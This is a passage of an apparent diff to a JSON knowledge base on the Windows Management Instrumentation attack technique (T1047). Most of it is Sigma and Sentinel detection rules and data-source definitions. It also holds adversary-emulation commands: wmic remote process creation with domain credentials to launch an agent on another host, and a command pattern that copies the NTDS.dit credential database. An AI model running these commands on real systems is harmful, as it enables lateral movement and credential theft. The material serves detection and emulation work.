"technique": { + "attack_id": "T1047", + "name": "Windows Management Instrumentation" + }, + "platforms": { + "windows": { + "psh": { + "command": "wmic /node:`\"#{remote.host.fqdn}`\" /user:`\"#{domain.user.name}`\" /password:`\"#{domain.user.password}`\" process call create \"powershell.exe C:\\Users\\Public\\s4ndc4t.exe -server #{server} -group #{group}\";\n", 
+ "cleanup": "wmic /node:`\"#{remote.host.fqdn}`\" /user:`\"#{domain.user.name}`\" /password:`\"#{domain.user.password}`\" process call create \"taskkill /f /im s4ndc4t.exe\"\n" + }, + "cmd": { + "command": "wmic /node:`\"#{remote.host.fqdn}`\" /user:`\"#{domain.user.name}`\" /password:`\"#{domain.user.password}`\" process call create \"cmd.exe C:\\Users\\Public\\s4ndc4t.exe -server #{server} -group #{group}\";\n", + "cleanup": "wmic /node:`\"#{remote.host.fqdn}`\" /user:`\"#{domain.user.name}`\" /password:`\"#{domain.user.password}`\" process call create \"taskkill /f /im s4ndc4t.exe\"\n" + } + } + }, + "singleton": true, + "requirements": [ + { + "plugins.stockpile.app.requirements.basic": [ + { + "source": "domain.user.name", + "edge": "has_password", + "target": "domain.user.password" + } + ] + }, + { + "plugins.stockpile.app.requirements.basic": [ + { + "source": "remote.host.fqdn", + "edge": "has_54ndc47_copy" + } + ] + }, + { + "plugins.stockpile.app.requirements.req_like": [ + { + "source": "remote.host.fqdn", + "edge": "has_admin", + "target": "domain.user.name" + } + ] + }, + { + "plugins.stockpile.app.requirements.no_backwards_movement": [ + { + "source": "remote.host.fqdn" + } + ] + }, + { + "plugins.stockpile.app.requirements.reachable": [ + { + "source": "remote.host.fqdn", + "edge": "isAccessibleFrom" + } + ] + } + ] + }, + { + "chain_id": "100098", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "/NODE:*process call create*", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "wmi", + "mitre_attack": "T1047", + "itw_sample": "f86c9d4c4b0afad1bb812fff0191b50c731760494ed45986e93b858daf386226" + }, + { + "chain_id": "100099", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "/NODE:*path AntiVirusProduct get*", + "sub_process_1": "", + "sub_process_2": "", + 
"loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "wmi", + "mitre_attack": "T1047", + "itw_sample": "" + }, + { + "chain_id": "100100", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "/NODE:*path FirewallProduct get*", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "wmi", + "mitre_attack": "T1047", + "itw_sample": "" + }, + { + "chain_id": "100102", + "os": "windows", + "parent_process": "WmiPrvSE.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "wmi", + "mitre_attack": "T1047", + "itw_sample": "" + }, + { + "chain_id": "100171", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "/NODE: \"192.168.0.1\" process call create \"*.exe\"", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "execution", + "mitre_attack": "T1047", + "itw_sample": "" + }, + { + "chain_id": "100172", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "/node:REMOTECOMPUTERNAME PROCESS call create \"at 9:00PM ^> \"", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "execution", + "mitre_attack": "T1047", + "itw_sample": "" + }, + { + "chain_id": "100173", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "/node:REMOTECOMPUTERNAME PROCESS call create \"cmd /c vssadmin create shadow 
/for=C:\\Windows\\NTDS\\NTDS.dit > c:\\not_the_NTDS.dit\"", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "execution", + "mitre_attack": "T1047", + "itw_sample": "" + }, + { + "Empire Module": "powershell/lateral_movement/invoke_wmi", + "ATT&CK Technique #1": "T1047", + "ATT&CK Technique #2": "", + "Technique": "Windows Management Instrumentation", + "Concatenate for Python Dictionary": "\"powershell/lateral_movement/invoke_wmi\": [\"T1047\"]," + }, + { + "Empire Module": "powershell/persistence/elevated/wmi", + "ATT&CK Technique #1": "T1047", + "ATT&CK Technique #2": "", + "Technique": "Windows Management Instrumentation", + "Concatenate for Python Dictionary": "\"powershell/persistence/elevated/wmi\": [\"T1047\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 20 and wmi_consumer_type contains \"Command Line\"", + "name": "WMI Command Execution" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 11 and process_command_line contains \"C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe\"", + "name": "Windows Management Instrumentation Active Script Event Consumer FileAccess" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_parent_command_line contains \"C:\\\\Windows\\\\System32\\\\svchost.exe\"or process_command_line contains \"C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe\")", + "name": "Windows Management Instrumentation Active Script Event Consumer Process" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 3 and (process_path contains \"wmic.exe\"or process_command_line contains \"wmic\")", + "name": "Windows Management Instrumentation Network" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_parent_command_line contains 
\"wmiprvse.exe\"or process_path contains \"wmic.exe\"or process_command_line contains \"wmic\")", + "name": "Windows Management Instrumentation Process" + } + ], + "possible_detections": [ + { + "title": "SquiblyTwo", + "id": "8d63dadf-b91b-4187-87b6-34a1114577ea", + "status": "experimental", + "description": "Detects WMI SquiblyTwo Attack with possible renamed WMI by looking for imphash", + "references": [ + "https://subt0x11.blogspot.ch/2018/04/wmicexe-whitelisting-bypass-hacking.html", + "https://twitter.com/mattifestation/status/986280382042595328" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1047" + ], + "author": "Markus Neis / Florian Roth", + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "Image": [ + "*\\wmic.exe" + ], + "CommandLine": [ + "wmic * *format:\\\"http*", + "wmic * /format:'http", + "wmic * /format:http*" + ] + }, + "selection2": { + "Imphash": [ + "1B1A3F43BF37B5BFE60751F2EE2F326E", + "37777A96245A3C74EB217308F3546F4C", + "9D87C9D67CE724033C0B40CC4CA1B206" + ], + "CommandLine": [ + "* *format:\\\"http*", + "* /format:'http", + "* /format:http*" + ] + }, + "condition": "1 of them" + } + }, + { + "title": "Suspicious WMI execution", + "id": "526be59f-a573-4eea-b5f7-f0973207634d", + "status": "experimental", + "description": "Detects WMI executing suspicious commands", + "references": [ + "https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/", + "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1", + "https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/" + ], + "author": "Michael Haag, Florian Roth, juju4", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": [ + "*\\wmic.exe" + ], + "CommandLine": [ + "*/NODE:*process call create *", + "* path 
AntiVirusProduct get *", + "* path FirewallProduct get *", + "* shadowcopy delete *" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "car.2016-03-002" + ], + "falsepositives": [ + "Will need to be tuned", + "If using Splunk, I recommend | stats count by Computer,CommandLine following for easy hunting by Computer/CommandLine." + ], + "level": "medium" + }, + { + "title": "Login with WMI", + "id": "5af54681-df95-4c26-854f-2565e13cfab0", + "status": "stable", + "description": "Detection of logins performed with WMI", + "author": "Thomas Patzke", + "tags": [ + "attack.execution", + "attack.t1047" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": 4624, + "ProcessName": "*\\WmiPrvSE.exe" + }, + "condition": "selection" + }, + "falsepositives": [ + "Monitoring tools", + "Legitimate system administration" + ], + "level": "low" + }, + { + "title": "WMI Persistence", + "id": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", + "status": "experimental", + "description": "Detects suspicious WMI event filter and command line event consumer based on event id 5861 and 5859 (Windows 10, 2012 and higher)", + "author": "Florian Roth", + "references": [ + "https://twitter.com/mattifestation/status/899646620148539397", + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1047" + ], + "logsource": { + "product": "windows", + "service": "wmi" + }, + "detection": { + "selection": { + "EventID": 5861 + }, + "keywords": { + "Message": [ + "*ActiveScriptEventConsumer*", + "*CommandLineEventConsumer*", + "*CommandLineTemplate*" + ] + }, + "selection2": { + "EventID": 5859 + }, + "condition": "selection and 1 of keywords or selection2" + }, + "falsepositives": [ + "Unknown (data set is too small; further testing needed)" + ], + "level": "medium" + }, + 
{ + "title": "WMI Persistence - Script Event Consumer", + "id": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", + "status": "experimental", + "description": "Detects WMI script event consumers", + "references": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/" + ], + "author": "Thomas Patzke", + "date": "2018/03/07", + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1047" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "C:\\WINDOWS\\system32\\wbem\\scrcons.exe", + "ParentImage": "C:\\Windows\\System32\\svchost.exe" + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate event consumers" + ], + "level": "high" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Netflow/Enclave netflow" + ], + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": 
"Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
